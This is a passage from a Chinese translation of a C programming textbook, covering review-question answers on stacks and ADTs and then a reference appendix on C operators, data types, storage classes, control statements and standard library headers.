p2; if (*a1 > *a2) return -1; else if (*a1 == *a2) return 0; else return 1; } 14.a.函数调用应该类似:memcpy(data1, data2, 100 * sizeof(double)); b.函数调用应该类似:memcpy(data1, data2 + 200 , 100 * sizeof(double)); 1517 A.17 第17章复习题答案 1.定义一种数据类型包括确定如何储存数据,以及设计管理该数据的一 系列函数。 2.因为每个结构包含下一个结构的地址,但是不包含上一个结构的地 址,所以这个链表只能沿着一个方向遍历。可以修改结构,在结构中包含两 个指针,一个指向上一个结构,一个指向下一个结构。当然,程序也要添加 代码,在每次新增结构时为这些指针赋正确的地址。 3.ADT是抽象数据类型,是对一种类型属性集和可以对该类型进行的操 作的正式定义。ADT应该用一般语言表示,而不是用某种特殊的计算机语 言,而且不应该包含实现细节。 4.直接传递变量的优点:该函数查看一个队列,但是不改变其中的内 容。直接传递队列变量,意味着该函数使用的是原始队列的副本,这保证了 该函数不会更改原始的数据。直接传递变量时,不需要使用地址运算符或指 针。 直接传递变量的缺点:程序必须分配足够的空间储存整个变量,然后拷 贝原始数据的信息。如果变量是一个大型结构,用这种方法将花费大量的时 间和内存空间。 传递变量地址的优点:如果待传递的变量是大型结构,那么传递变量的 地址和访问原始数据会更快,所需的内存空间更少。 传递变量地址的缺点:必须记得使用地址运算符或指针。在K&R C中, 函数可能会不小心改变原 始数据,但是用ANSI C中的const限定符可以解决这个问题。 5.a. 类型名:    栈 1518 类型属性:   可以储存有序项 类型操作:   初始化栈为空 确定栈是否为空 确定栈是否已满 从栈顶添加项(压入项) 从栈顶删除项(弹出项) b.下面以数组形式实现栈,但是这些信息只影响结构定义和函数定义的 细节,不会影响函数原型的接口。 /* stack.h –– 栈的接口 */ #include <stdbool.h> /* 在这里插入 Item 类型 */ /* 例如: typedef int Item; */ #define MAXSTACK 100 typedef struct stack { Item items[MAXSTACK];  /* 储存信息    */ int top;       /* 第1个空位的索引 */ } Stack; /* 操作:   初始化栈                 */ 1519 /* 前提条件:  ps 指向一个栈               */ /* 后置条件:  该栈被初始化为空              */ void InitializeStack(Stack * ps); /* 操作:   检查栈是否已满              */ /* 前提条件:  ps 指向之前已被初始化的栈          */ /* 后置条件:  如果栈已满,该函数返回true;否则,返回false   */ bool FullStack(const Stack * ps); /* 操作:   检查栈是否为空              */ /* 前提条件:  ps 指向之前已被初始化的栈          */ /* 后置条件:  如果栈为空,该函数返回true;否则,返回false   */ bool EmptyStack(const Stack *ps); /* 操作:   把项压入栈顶               */ /* 前提条件:  ps 指向之前已被初始化的栈          */ /*      item 是待压入栈顶的项            */ /* 后置条件:  如果栈不满,把 item 放在栈顶,该函数返回ture;  */ /*      否则,栈不变,该函数返回 false        */ bool Push(Item item, Stack * ps); 1520 /* 操作:   从栈顶删除项               */ /* 前提条件:  ps 指向之前已被初始化的栈          */ /* 后置条件:  如果栈不为空,把栈顶的item拷贝到*pitem,    */ /*    删除栈顶的item,该函数返回ture;         */ /*    如果该操作后栈中没有项,则重置该栈为空。       */ /*    如果删除操作之前栈为空,栈不变,该函数返回false    */ bool Pop(Item *pitem, Stack * ps); 6.比较所需的最大次数如下: 7.见图A.1。 1521 图A.1 单词的二分查找树 8.见图A.2。 1522 图A.2 删除项后的单词二分查找树 [1].这句英文翻译成中文是“这句话是出色的捷克人”。显然不知所云,这就 是语言中的语义错误。——译者注 [2].thrice_n本应表示n的3倍,但是3 + n表示的并不是n的3倍,应该用3*n来表 示。——译者注 1523 附录B 参考资料 本书这部分总结了C语言的基本特性和一些特定主题的详细内容,包括 以下9个部分。 参考资料I:补充阅读 参考资料II:C运算符 参考资料III:基本类型和存储类别 参考资料IV:表达式、语句和程序流 参考资料V:新增了C99和C11的标准ANSI C库 参考资料VI:扩展的整数类型 参考资料VII:扩展的字符支持 参考资料VIII:C99/C11数值计算增强 参考资料IX:C与C++的区别 1524 B.1 参考资料I:补充阅读 如果想了解更多C语言和编程方面的知识,下面提供的资料会对你有所 帮助。 B.1.1 在线资源 C程序员帮助建立了互联网,而互联网可以帮助你学习C。互联网时刻 都在发展、变化,这里所列的资源只是在撰写本书时可用的资源。当然,你 可以在互联网中找到其他资源。 如果有一些与C语言相关的问题或只是想扩展你的知识,可以浏览C FAQ(常见问题解答)的站点: c-faq.com 但是,这个站点的内容主要涵盖到C89。 如果对C库有疑问,可以访问这个站点获得信息: www.acm.uiuc.edu/webmonkeys/book/c_guide/index.html。 这个站点全面讨论指针:pweb.netcom.com/~tjensen/ptr/pointers.htm。 还可以使用谷歌和雅虎的搜索引擎,查找相关文章和站点: www.google.com search.yahoo.com www.bing.com 可以使用这些站点中的高级搜索特性来优化你要搜索的内容。例如,尝 试搜索C教程。 你可以通过新闻组(newsgroup)在网上提问。通常,新闻组阅读程序 1525 通过你的互联网服务提供商提供的账号访问新闻组。另一种访问方法是在网 页浏览器中输入这个地址:http://groups.google.com。 你应该先花时间阅读新闻组,了解它涵盖了哪些主题。例如,如果你对 如何使用C语言完成某事有疑问,可以试试这些新闻组: comp.lang.c comp.lang.c.moderated 可以在这里找到愿意提供帮助的人。你所提的问题应该与标准 C 语言 相关,不要在这里询问如何在UNIX系统中获得无缓冲输入之类的问题。特 定平台都有专门的新闻组。最重要的是,不要询问他们如何解决家庭作业中 的问题。 如果对C标准有疑问,试试这个新闻组:comp.std.c。但是,不要在这里 询问如何声明一个指向三维数组的指针,这类问题应该到另一个新闻组: comp.lang.c。 最后,如果对C语言的历史感兴趣,可以浏览下C创始人Dennis Ritchie 的站点,其中1993年中有一篇文章介绍了C的起源和发展:cm.bell- labs.com/cm/cs/who/dmr/chist.html。 B.1.2 C语言书籍 Feuer,Alan R.The C Puzzle Book,Revised Printing Upper Saddle River, NJ: Addison-WesleyProfessional, 1998。这本书包含了许多程序,可以用来学 习,推测这些程序应输出的内容。预测输出对测试和扩展 C 的理解很有帮 助。本书也附有答案和解释。 Kernighan, Brian W.and Dennis M.Ritchie.The C Programming Language, Second Edition .Englewood Cliffs, NJ: Prentice Hall, 1988。第1本C语言书的第 2版(注意,作者Dennis Ritchie是C的创始者)。本书的第1版给出了K&R C 的定义,许多年来它都是非官方的标准。第2版基于当时的ANSI草案进行了 1526 修订,在编写本书时该草案已成为了标准。本书包含了许多有趣的例子,但 是它假定读者已经熟悉了系统编程。 Koenig,Andrew.C Traps and Pitfalls.Reading,MA:Addison-Wesley,1989。本 书的中文版《C陷阱与缺陷》已由人民邮电出版社出版。 Summit,Steve.C Programming FAQs.Reading,MA:Addison-Wesley,1995。这 本书是互联网FAQ的延伸阅读版本。 B.1.3 编程书籍 Kernighan, Brian W.and P.J.Plauger.The Elements of Programming Style, Second Edition .NewYork:McGraw-Hill, 1978。这本短小精悍的绝版书籍,历 经岁月却无法掩盖其真知灼见。书中介绍了要编写高效的程序,什么该做, 什么不该做。 Knuth,Donald E.The Art of Computer Programming, 第1卷(基本算法), Third Edition.Reading,MA:Addison-Wesley, 1997。这本经典的标准参考书非常 详尽地介绍了数据表示和算法分析。第2卷(半数学算法,1997)探讨了伪 随机数。第 3 卷(排序和搜索,1998)介绍了排序和搜索,以伪代码和汇编 语言的形式给出示例。 Sedgewick, Robert.Algorithms in C, Parts 1-4:Fundamentals,Data Structures,Sorting,Searching,Third Edition.Reading, MA: Addison-Wesley Professional, 1997。顾名思义,这本书介绍了数据结构、排序和搜索。本书 中文版《C算法(第1卷)基础、数据结构、排序和搜索(第3版)》已由人 民邮电出版社出版。 B.1.4 参考书籍 Harbison, Samuel P.and Steele, Guy L.C: A Reference Manual, Fifth Edition.Englewood Cliffs,NJ:Prentice Hall, 2002。这本参考手册介绍了C语言 的规则和大多数标准库函数。它结合了C99,提供了许多例子。《C语言参 1527 考手册(第5版)(英文版)》已由人民邮电出版社出版。 Plauger,P.J.The Standard C Library.Englewood Cliffs,NJ:Prentice Hall,1992。这本大型的参考手册介绍了标准库函数,比一般的编译器手册更 详尽。 The International C Standard.ISO/IEC 9899:2011。在撰写本书时,可以花 285美元从www.ansi.org下载该标准的电子版,或者花238欧元从IEC下载。 别指望通过这本书学习C语言,因为它并不是一本学习教程。这是一句有代 表性的话,可见一斑:“如果在一个翻译单元中声明一个特定标识符多次, 在该翻译单元中都可见,那么语法可根据上下文无歧义地引用不同的实 体”。 B.1.5 C++书籍 Prata,Stephen.C++Primer Plus,Sixth Edition.Upper Saddle River,NJ:Addison- Wesley,2012。本书介绍了C++语言(C++11标准)和面向对象编程的原则。 Stroustrup, Bjarne.The C++Programming Language, Fourth Edition.Reading, MA: Addison-Wesley, 2013。本书由C++的创始人撰写,介绍了C++11标准。 1528 B.2 参考资料II:C运算符 C语言有大量的运算符。表B.2.1按优先级从高至低的顺序列出了C运算 符,并给出了其结合性。除非特别指明,否则所有运算符都是二元运算符 (需要两个运算对象)。注意,一些二元运算符和一元运算符的表示符号相 同,但是其优先级不同。例如,*(乘法运算符)和*(间接运算符)。表后 面总结了每个运算符的用法。 表B.2.1 C运算符 B.2.1 算术运算符 + 把右边的值加到左边的值上。 + 作为一元运算符,生成一个大小和符号都与右边值相同的值。 - 从左边的值中减去右边的值。 1529 - 作为一元运算符,生成一个与右边值大小相等符号相反的值。 * 把左边的值乘以右边的值。 / 把左边的值除以右边的值;如果两个运算对象都是整数,其结果要被 截断。 % 得左边值除以右边值时的余数 ++ 把右边变量的值加1(前缀模式),或把左边变量的值加1(后缀模 式)。 -- 把右边变量的值减1(前缀模式),或把左边变量的值减1(后缀模 式)。 B.2.2 关系运算符 下面的每个运算符都把左边的值与右边的值相比较。 <  小于 <=  小于或等于 ==  等于 >=  大于或等于 >  大于 !=  不等于 关系表达式 简单的关系表达式由关系运算符及其两侧的运算对象组成。如果关系为 真,则关系表达式的值为 1;如果关系为假,则关系表达式的值为0。下面 是两个例子: 1530 5 > 2 关系为真,整个表达式的值为1。 (2 + a) == a 关系为假,整个表达式的值为0。 B.2.3 赋值运算符 C语言有一个基本赋值运算符和多个复合赋值运算符。=运算符是基本 的形式: = 把它右边的值赋给其左边的左值。 下面的每个赋值运算符都根据它右边的值更新其左边的左值。我们使用 R-H表示右边,L-R表示左边。 += 把左边的变量加上右边的量,并把结果储存在左边的变量中。 -= 从左边的变量中减去右边的量,并把结果储存在左边的变量中。 *= 把左边的变量乘以右边的量,并把结果储存在左边的变量中。 /= 把左边的变量除以右边的量,并把结果储存在左边的变量中。 %= 得到左边量除以右边量的余数,并把结果储存在左边的变量中。 &= 把L-H & R-H的值赋给左边的量,并把结果储存在左边的变量中。 |= 把L-H | R-H的值赋给左边的量,并把结果储存在左边的变量中。 ^= 把L-H ^ R-H的值赋给左边的量,并把结果储存在左边的变量中。 >>= 把L-H >> R-H的值赋给左边的量,并把结果储存在左边的变量中。 <<= 把L-H << R-H的值赋给左边的量,并把结果储存在左边的变量中。 示例 rabbits *= 1.6;与rabbits = rabbits * 1.6效果相同。 1531 B.2.4 逻辑运算符 逻辑运算符通常以关系表达式作为运算对象。!运算符只需要一个运算 对象,其他运算符需要两个运算对象,运算符左边一个,右边一个。 && 逻辑与 || 逻辑或 ! 逻辑非 1.逻辑表达式 当且仅当两个表达式都为真时,expresson1 && expresson 2的值才为 真。 两个表达式中至少有一个为真时,expresson 1 && expresson 2的值就为 真。 如果expresson的值为假,则!expresson为真,反之亦然。 2.逻辑表达式的求值顺序 逻辑表达式的求值顺序是从左往右。当发现可以使整个表达式为假的条 件时立即停止求值。 3.示例 6 > 2 && 3 == 3 为真。 !(6 > 2 && 3 == 3) 为假。 x != 0 && 20/x < 5 只有在x是非零时才会对第2个表达式求值。 B.2.5 条件运算符 1532 ?:有3个运算对象,每个运算对象都是一个表达式:expression1 ? expression2 : expression3 如果expression1为真,则整个表达式的值等于expression2的值;否则, 等于expression3的值。 示例 (5 > 3) ? 1 : 2的值为1。 (3 > 5) ? 1 : 2的值为2。 (a > b) ? a : b的值是a和b中较大者 B.2.6 与指针有关的运算符 &是地址运算符。当它后面是一个变量名时,&给出该变量的地址。 *是间接或解引用运算符。当它后面是一个指针时,*给出储存在指针指 向地址中的值。 示例 &nurse是变量nurse的地址: nurse = 22; ptr = &nurse; /* 指向nurse的指针 */ val = *ptr; 以上代码的效果是把22赋给val。 B.2.7 符号运算符 -是负号,反转运算对象的符号。 1533 + 是正号,不改变运算对象的符号。 B.2.8 结构和联合运算符 结构和联合使用一些运算符标识成员。成员运算符与结构和联合一起使 用,间接成员运算符与指向结构或联合的指针一起使用。 1.成员运算符 成员运算符(.)与结构名或联合名一起使用,指定结构或联合中的一 个成员。如果name是一个结构名,member是该结构模板指定的成员名,那 么name.member标识该结构中的这个成员。name.member的类型就是被指定 member的类型。在联合中也可以用相同的方式使用成员运算符。 示例 struct { int code; float cost; } item; item.code = 1265; 上面这条语句把1265赋给结构变量item的成员code。 2.间接成员运算符(或结构指针运算符) 间接成员运算符(->)与一个指向结构或联合的指针一起使用,标识该 结构或联合的一个成员。假设ptrstr是一个指向结构的指针,member是该结 构模板指定的成员,那么ptrstr->member标识了指针所指向结构的这个成 员。在联合中也可以用相同的方式使用间接成员运算符。 示例 1534 struct { int code; float cost; } item, * ptrst; ptrst = &item; ptrst->code = 3451; 以上程序段把3451赋给结构item的成员code。下面3种写法是等效的: ptrst->code item.code  (*ptrst).code B.2.9 按位运算符 下面所列除了~,都是按位运算符。 ~ 是一元运算符,它通过翻转运算对象的每一位得到一个值。 & 是逻辑与运算符,只有当两个运算对象中对应的位都为1时,它生成 的值中对应的位才为1。 | 是逻辑或运算符,只要两个运算对象中对应的位有一位为1,它生成的 值中对应的位就为1。 ^ 是按位异或运算符,只有两个运算对象中对应的位中只有一位为 1(不能全为1),它生成的值中对应的位才为1。 << 是左移运算符,把左边运算对象中的位向左移动得到一个值。移动 的位数由该运算符右边的运算对象确定,空出的位用0填充。 >> 是右移运算符,把左边运算对象中的位向右移动得到一个值。移动 的位数由该运算符右边的运算对象确定,空出的位用0填充。 1535 示例 假设有下面的代码: int x = 2; int y = 3; x & y的值为2,因为x和y的位组合中,只有第1位均为1。而y << x的值 为12,因为在y的位组合中,3的位组合向左移动两位,得到12。 B.2.10 混合运算符 sizeof给出它右边运算对象的大小,单位是char的大小。通常,char类型 的大小是1字节。运算对象可以圆括号中的类型说明符,如sizeof(float),也 可以是特定的变量名、数组名等,如sizeof foo。sizeof表达式的类型是 size_t。 _Alignof(C11)给出它的运算对象指定类型的对齐要求。一些系统要 求以特定值的倍数在地址上储存特定类型,如4的倍数。这个整数就是对齐 要求。 (类型名)是强制类型转换运算符,它把后面的值转换成圆括号中关键 字指定的类型。例如,(float)9把整数9转换成浮点数9.0。 ,是逗号运算符,它把两个表达式链接成一个表达式,并保证先对最左 端的表达式求值。整个表达式的值是最右边表达式的值。该运算符通常在 for循环头中用于包含更多的信息。 示例 for (step = 2, fargo = 0; fargo < 1000; step *= 2) fargo += step; 1536 B.3 参考资料III:基本类型和存储类别 B.3.1 总结:基本数据类型 C语言的基本数据类型分为两大类:整数类型和浮点数类型。不同的种 类提供了不同的范围和精度。 1.关键字 创建基本数据类型要用到8个关键字:int、long、short、unsigned、 char、float、double、signed(ANSI C)。 2.有符号整数 有符号整数可以具有正值或负值。 int是所有系统中基本整数类型。 long或long int可储存的整数应大于或等于int可储存的最大数;long至少 是32位。 short或short int整数应小于或等于int可储存的最大数;short至少是16 位。通常,long比short大。例如,在PC中的C DOS编译器提供16位的short和 int、32位的long。这完全取决于系统。 C99标准提供了long long类型,至少和long一样大,至少是64位。 3.无符号整数 无符号整数只有 0 和正值,这使得该类型能表示的正数范围更大。在所 需的类型前面加上关键字unsigned:unsigned int、unsigned long、unsigned short、unsigned long long。单独的unsigned相当于unsigned int。 4.字符 1537 字符是如A、&、+这样的印刷符号。根据定义,char类型的变量占用1 字节的内存。过去,char类型的大小通常是8位。然而,C在处理更大的字符 集时,char类型可以是16位,或者甚至是32位。 这种类型的关键字是char。一些实现使用有符号的char,但是其他实现 使用无符号的char。ANSI C允许使用关键字signed 和 unsigned指定所需类 型。从技术层面上看,char、unsigned char和signed char是3种不同的类型, 但是char类型与其他两种类型的表示方法相同。 5.布尔类型(C99) _Bool是C99新增的布尔类型。它一个无符号整数类型,只能储存0(表 示假)或1(表示真)。包含stdbool.c头文件后,可以用bool表示_Bool、ture 表示1、false表示0,让代码与C++兼容。 6.实浮点数和复浮点数类型 C99识别两种浮点数类型:实浮点数和复浮点数。浮点类型由这两种类 型构成。 实浮点数可以是正值或负值。C识别3种实浮点类型。 float是系统中的基本浮点类型。它至少可以精确表示6位有效数字,通 常float为32位。 double(可能)表示更大的浮点数。它能表示比 float更多的有效数字和 更大的指数。它至少能精确表示10位有效数字。通常,double为64位。 long double(可能)表示更大的浮点数。它能表示比double更多的有效 数字和更大的指数。 复数由两部分组成:实部和虚部。C99 规定一个复数在内部用一个有两 个元素的数组表示,第 1 个元素表示实部,第2个元素表示虚部。有3种复浮 点数类型。 1538 float _Complex表示实部和虚部都是float类型的值。 double _Complex表示实部虚部都是double类型的值。 long double _Complex表示实部和虚部都是long double类型的值。 每种情况,前缀部分的类型都称为相应的实数类型(corresponding real type)。例如,double是double_Complex相应的实数类型。 C99中,复数类型在独立环境中是可选的,这样的环境中不需要操作系 统也可运行C程序。在C11中,复数类型在独立环境和主机环境都是可选 的。 有 3 种虚数类型。它们在独立环境中和主机环境中(C 程序在一种操作 系统下运行的环境)都是可选的。虚数只有虚部。这3种类型如下。 float _Imaginary表示虚部是float类型的值。 double _Imaginary表示虚部是double类型的值。 long double _Imaginary表示虚部是long double类型的值。 可以用实数和I值来初始化复数。I定义在complex.h头文件中,表示 i(即-1的平方根)。 #include <complex.h>        // I定义在该头文件中 double _Complex z = 3.0;      // 实部 = 3.0,虚部 = 0 double _Complex w = 4.0 * I;    // 实部 = 0.0,虚部 = 4.0 double Complex u = 6.0 – 8.0 * I; //实部= 6.0,虚部 = -8.0 前面章节讨论过,complex.h库包含一些返回复数实部和虚部的函数。 B.3.2 总结:如何声明一个简单变量 1539 1.选择所需的类型。 2.选择一个合适的变量名。 3.使用这种声明格式:type-specifiervariable-name; type-specifier由一个或多个类型关键字组成,下面是一些例子: int erest; unsigned short cash; 4.声明多个同类型变量时,使用逗号分隔符隔开各变量名: char ch, init, ans; 5.可以在声明的同时初始化变量: float mass = 6.0E24; 总结:存储类别 关键字:auto、extern、static、register、_Thread_local(C11) 一般注解: 变量的存储类别取决于它的作用域、链接和存储期。存储类别由声明变 量的位置和与之关联的关键字决定。定义在所有函数外部的变量具有文件作 用域、外部链接、静态存储期。声明在函数中的变量是自动变量,除非该变 量前面使用了其他关键字。它们具有块作用域、无链接、自动存储期。以 static关键字声明在函数中的变量具有块作用域、无链接、静态存储期。以 static关键字声明在函数外部的变量具有文件作用域、内部链接、静态存储 期。 C11 新增了一个存储类别说明符:_Thread_local。以该关键字声明的对 象具有线程存储期,意思是在线程中声明的对象在该线程运行期间一直存 1540 在,且在线程开始时被初始化。因此,这种对象属于线程私有。 属性: 下面总结了这些存储类别的属性: 续表 注意,关键字extern只能用来再次声明在别处已定义过的变量。在函数 外部定义变量,该变量具有外部链接属性。 除了以上介绍的存储类别,C 还提供了动态分配内存。这种内存通过调 用 malloc()函数系列中的一个函数来分配。这种函数返回一个可用于访问内 存的指针。调用 free()函数或结束程序可以释放动态分配的内存。任何可以 访问指向该内存指针的函数均可访问这块内存。例如,一个函数可以把这个 指针的值返回给另一个函数,那么另一个函数也可以访问该指针所指向的内 存。 B.3.3 总结:限定符 关键字 使用下面关键字限定变量: 1541 const、volatile、restrict 一般注释 限定符用于限制变量的使用方式。不能改变初始化以后的 const 变量。 编译器不会假设 volatile变量不被某些外部代理(如,一个硬件更新)改 变。restrict 限定的指针是访问它所指向内存的唯一方式(在特定作用域 中)。 属性 const int joy = 101;声明创建了变量joy,它的值被初始化为101。 volatile unsigned int incoming;声明创建了变量incoming,该变量在程序中 两次出现之间,其值可能会发生改变。 const int * ptr = &joy;声明创建了指针ptr,该指针不能用来改变变量joy的 值,但是它可以指向其他位置。 int * const ptr = &joy;声明创建了指针ptr,不能改变该指针的值,即ptr只 能指向joy,但是可以用它来改变joy的值。 void simple (const char * s);声明表明形式参数s被传递给simple()的值初始 化后,simple()不能改变s指向的值。 void supple(int * const pi);与void supple(int pi[const]);等价。这两个声明 都表明supple()函数不会改变形参pi。 void interleave(int * restrict p1, int * restrict p2, int n);声明表明p1和p2是访 问它们所指向内存的唯一方法,这意味着这两个块不能重叠。 1542 B.4 参考资料IV:表达式、语句和程序流 B.4.1 总结:表达式和语句 在C语言中,对表达式可以求值,通过语句可以执行某些行为。 表达式 表达式由运算符和运算对象组成。最简单的表达式是一个常量或一个不 带运算符的变量,如 22 或beebop。稍复杂些的例子是55 + 22和vap = 2 * (vip + (vup = 4))。 语句 大部分语句都以分号结尾。以分号结尾的表达式都是语句,但这样的语 句不一定有意义。语句分为简单语句和复合语句。简单语句以分号结尾,如 下所示: toes = 12;       // 赋值表达式语句 printf("%d\n", toes); // 函数调用表达式语句 ;           //空语句,什么也不做 (注意,在C语言中,声明不是语句。) 用花括号括起来的一条或多条语句是复合语句或块。如下面的while语 句所示: while (years < 100) { wisdom = wisdom + 1; printf("%d %d\n", years, wisdom); 1543 years = years + 1; } B.4.2 总结:while语句 关键字 while语句的关键字是while。 一般注释 while语句创建了一个循环,在expression为假之前重复执行。while语句 是一个入口条件循环,在下一轮迭代之前先确定是否要再次循环。因此可能 一次循环也不执行。statement可以是一个简单语句或复合语句。 形式 while ( expression ) statement 当expression为假(或0)之前,重复执行statement部分。 示例 while (n++ < 100) printf(" %d %d\n",n, 2*n+1); while (fargo < 1000) { fargo = fargo + step; step = 2 * step; 1544 } B.4.3 总结:for语句 关键字 for语句的关键字是for。 一般注释 for语句使用3个控制表达式控制循环过程,分别用分号隔开。initialize 表达式在执行for语句之前只执行一次;然后对test表达式求值,如果表达式 为真(或非零),执行循环一次;接着对update表达式求值,并再次检查test 表达式。for语句是一种入口条件循环,即在执行循环之前就决定了是否执 行循环。因此,for循环可能一次都不执行。statement部分可以是一条简单语 句或复合语句。 形式: for ( initialize; test; update ) statement 在test为假或0之前,重复执行statement部分。 C99允许在for循环头中包含声明。变量的作用域和生命期被限制在for循 环中。 示例: for (n = 0; n < 10 ; n++) printf(" %d %d\n", n, 2 * n + 1); for (int k = 0; k < 10 ; ++k) // C99 1545 printf("%d %d\n", k, 2 * k+1); B.4.4 总结:do while语句 关键字 do while语句的关键字是do和while。 一般注解: do while语句创建一个循环,在expression为假或0之前重复执行循环体 中的内容。do while语句是一种出口条件循环,即在执行完循环体后才根据 测试条件决定是否再次执行循环。因此,该循环至少必须执行一次。 statement部分可是一条简单语句或复合语句。 形式: do statement while ( expression ); 在test为假或0之前,重复执行statement部分。 示例: do scanf("%d", &number); while (number != 20); B.4.5 总结:if语句 小结:用if语句进行选择 1546 关键字:if、else 一般注解: 下面各形式中,statement可以是一条简单语句或复合语句。表达式为真 说明其值是非零值。 形式1: if (expression) statement 如果expression为真,则执行statement部分。 形式2: if (expression) statement1 else statement2 如果expression为真,执行statement1部分;否则,执行statement2部分。 形式3: if (expression1) statement1 else if (expression2) statement2 1547 else statement3 如果expression1为真,执行statement1部分;如果expression2为真,执行 statement2部分;否则,执行statement3部分。 示例: if (legs == 4) printf("It might be a horse.\n"); else if (legs > 4) printf("It is not a horse.\n"); else   /* 如果legs < 4 */ { legs++; printf("Now it has one more leg.\n"); } B.4.6 带多重选择的switch语句 关键字:switch 一般注解: 程序控制根据expression的值跳转至相应的case标签处。然后,程序流执 行剩下的所有语句,除非执行到break语句进行重定向。expression和case标 签都必须是整数值(包括char类型),标签必须是常量或完全由常量组成的 1548 表达式。如果没有case标签与expression的值匹配,控制则转至标有default的 语句(如果有的话);否则,控制将转至紧跟在switch语句后面的语句。控 制转至特定标签后,将执行switch语句中其后的所有语句,除非到达switch 末尾,或执行到break语句。 形式: switch ( expression ) { case label1 : statement1//使用break跳出switch case label2 : statement2 default   : statement3 } 可以有多个标签语句,default语句可选。 示例: switch (value) { case 1 : find_sum(ar, n); break; case 2 : show_array(ar, n); break; case 3 : puts("Goodbye!"); 1549 break; default : puts("Invalid choice, try again."); break; } switch (letter) { case 'a' : case 'e' : printf("%d is a vowel\n", letter); case 'c' : case 'n' : printf("%d is in \"cane\"\n", letter); default : printf("Have a nice day.\n"); } 如果letter的值是'a'或'e',就打印这3条消息;如果letter的值是'c'或'n',则 只打印后两条消息;letter是其他值时,值打印最后一条消息。 B.4.7 总结:程序跳转 关键字:break、continue、goto 一般注解: 这3种语句都能使程序流从程序的一处跳转至另一处。 break语句: 1550 所有的循环和switch语句都可以使用break语句。它使程序控制跳出当前 循环或switch语句的剩余部分,并继续执行跟在循环或switch后面的语句。 示例: while ((ch = getchar()) != EOF) { putchar(ch); if (ch == ' ') break;    // 结束循环 chcount++; } continue语句: 所有的循环都可以使用continue语句,但是switch语句不行。continue语 句使程序控制跳出循环的剩余部分。对于while或for循环,程序执行到 continue语句后会开始进入下一轮迭代。对于do while循环,对出口条件求值 后,如有必要会进入下一轮迭代。 示例: while ((ch = getchar()) != EOF) { if (ch == ' ') continue; // 跳转至测试条件 1551 putchar(ch); chcount++; } 以上程序段打印用户输入的内容并统计非空格字符 goto语句: goto语句使程序控制跳转至相应标签语句。冒号用于分隔标签和标签语 句。标签名遵循变量命名规则。标签语句可以出现在goto的前面或后面。 形式: goto label ; label : statement 示例: top : ch = getchar(); if (ch != 'y') goto top; 1552 B.5 参考资料V:新增C99和C11的ANSI C库 ANSI C库把函数分成不同的组,每个组都有相关联的头文件。本节将 概括地介绍库函数,列出头文件并简要描述相关的函数。文中会较详细地介 绍某些函数(例如,一些I/O函数)。欲了解完整的函数说明,请参考具体 实现的文档或参考手册,或者试试这个在线参考: http://www.acm.uiuc.edu/webmonkeys/book/c_guide/。 B.5.1 断言:assert.h assert.h 头文件中把 assert()定义为一个宏。在包含 assert.h 头文件之前定 义宏标识符NDEBUG,可以禁用assert()宏。通常用一个关系表达式或逻辑表 达式作为assert()的参数,如果运行正常,那么程序在执行到该点时,作为参 数的表达式应该为真。表B.5.1描述了assert()宏。 表B.5.1 断言宏 C11新增了static_assert宏,展开为_Static_assert。_Static_assert是一个关 键字,被认为是一种声明形式。它以这种方式提供一个编译时检查: _Static_assert( 常量表达式,字符串字面量); 如果对常量表达式求值为0,编译器会给出一条包含字符串字面量的错 误消息;否则,没有任何效果。 B.5.2 复数:complex.h(C99) C99 标准支持复数计算,C11 进一步支持了这个功能。实现除提供 _Complex 类型外还可以选择是否提供_Imaginary类型。在C11中,可以选择 是否提供这两种类型。C99规定,实现必须提供_Complex类型,但是 _Imaginary类型为可选,可以提供或不提供。附录B的参考资料VIII中进一步 1553 讨论了C如何支持复数。complex.h头文件中定义了表B.5.2所列的宏。 表B.5.2 complex.h宏 对于实现复数方面,C和C++不同。C通过complex.h头文件支持,而 C++通过complex头文件支持。而且,C++使用类来定义复数类型。 可以使用STDC CX_LIMITED_RANGE编译指令来表明是使用普通的数 学公式(设置为on时),还是要特别注意极值(设置为off时): #include <complex.h> #pragma STDC CX_LIMITED_RANGE on 库函数分为3种:double、float、long double。表B.5.3列出了double版本 的函数。float和long double版本只需要在函数名后面分别加上f和l。即csinf() 就是csin()的float版本,而csinl()是csin()的long double版本。另外要注意,角 度的单位是弧度。 表B.5.3 复数函数 1554 续表 B.5.3 字符处理:ctype.h 这些函数都接受int类型的参数,这些参数可以表示为unsigned char类型 的值或EOF。使用其他值的效果是未定义的。在表B.5.4中,“真”表示“非0 值”。对一些定义的解释取决于当前的本地设置,这些由locale.h中的函数来 控制。该表显示了在解释本地化的“C”时要用到的一些函数。 表B.5.4 字符处理函数 1555 B.5.4 错误报告:errno.h errno.h头文件支持较老式的错误报告机制。该机制提供一个标识符(或 有时称为宏)ERRNO可访问的外部静态内存位置。一些库函数把一个值放 进这个位置用于报告错误,然后包含该头文件的程序就可以通过查看 ERRNO的值检查是否报告了一个特定的错误。ERRNO机制被认为不够艺 术,而且设置ERRNO值也不需要数学函数了。标准提供了3个宏值表示特殊 的错误,但是有些实现会提供更多。表B.5.5列出了这些标准宏。 表B.5.5 errno.h宏 B.5.5 浮点环境:fenv.h(C99) C99标准通过fenv.h头文件提供访问和控制浮点环境。 浮点环境(floating-point environment)由一组状态标志(status flag)和 1556 控制模式(control mode)组成。在浮点计算中发生异常情况时(如,被零 除),可以“抛出一个异常”。这意味着该异常情况设置了一个浮点环境标 志。控制模式值可以进行一些控制,例如控制舍入的方向。fenv.h头文件定 义了一组宏表示多种异常情况和控制模式,并提供了与环境交互的函数原 型。头文件还提供了一个编译指令来启用或禁用访问浮点环境的功能。 下面的指令开启访问浮点环境: #pragma STDC FENV_ACCESS on 下面的指令关闭访问浮点环境: #pragma STDC FENV_ACCESS off 应该把该编译指示放在所有外部声明之前或者复合块的开始处。在遇到 下一个编译指示之前、或到达文件末尾(外部指令)、或到达复合语句的末 尾(块指令),当前编译指示一直有效。 头文件定义了两种类型,如表B.5.6所示。 表B.5.6 fenv.h类型 头文件定义了一些宏,表示一些可能发生的浮点异常情况控制状态。其 他实现可能定义更多的宏,但是必须以FE_开头,后面跟大写字母。表B.5.7 列出了一些标准异常宏。 表B.5.7 fenv.h中的标准异常宏 1557 表B.5.8中列出了fenv.h头文件中的标准函数原型。注意,常用的参数值 和返回值与表B.5.7中的宏相对应。例如,FE_UPWARD是fesetround()的一个 合适参数。 表B.5.8 fenv.h中的标准函数原型 B.5.6 浮点特性:float.h float.h头文件中定义了一些表示各种限制和形参的宏。表B.5.9列出了这 1558 些宏,C11新增的宏以斜体并缩进标出。许多宏都涉及下面的浮点表示模 型: 如果第1个数f1是非0(且x是非0),该数字被称为标准化浮点数。附录 B的参考资料VIII中将更详细地解释一些宏。 表B.5.9 